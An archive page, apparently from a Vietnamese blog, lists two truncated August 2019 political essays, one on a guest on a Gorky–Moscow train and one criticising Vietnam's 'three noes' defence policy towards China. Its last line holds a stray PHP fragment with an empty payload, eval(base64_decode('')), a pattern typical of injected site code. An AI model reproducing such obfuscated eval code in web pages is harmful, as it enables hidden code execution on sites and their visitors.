Archive for August, 2019

NGƯỜI KHÁCH TRÊN CHUYẾN TÀU ĐIỆN GORKY-MOSCOW

NGƯỜI KHÁCH TRÊN CHUYẾN TÀU ĐIỆN GORKY-MOSCOW

Ngày 21 tháng 5 là ngày sinh nhật của người khách này, tôi viết một bài ngắn để mừng sinh nhật ông nhưng chỉ viết được phần đầu và vì một lý do riêng phải dừng lại cho đến nay. Câu chuyện về người khách bắt đầu lúc g

08.29.2019 | Tiểu Luận- Chính Luận |

No Comments

HẬU QUẢ CỦA CHÍNH SÁCH QUỐC PHÒNG “BA KHÔNG” VÀ ĐỐI NGOẠI “ĐU DÂY”

HẬU QUẢ CỦA CHÍNH SÁCH QUỐC PHÒNG “BA KHÔNG” VÀ ĐỐI NGOẠI “ĐU DÂY”

Theo dõi phản ứng của Trung Cộng (TC) trước mọi biến cố quốc tế nhất là về tranh chấp lãnh thổ sẽ thấy các lãnh đạo đảng CSTQ từ Đặng Tiểu Bình đến Tập Cận Bình chỉ áp dụng một chính sách, đó là đối phó riêng biệ

08.9.2019 | Tiểu Luận- Chính Luận |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>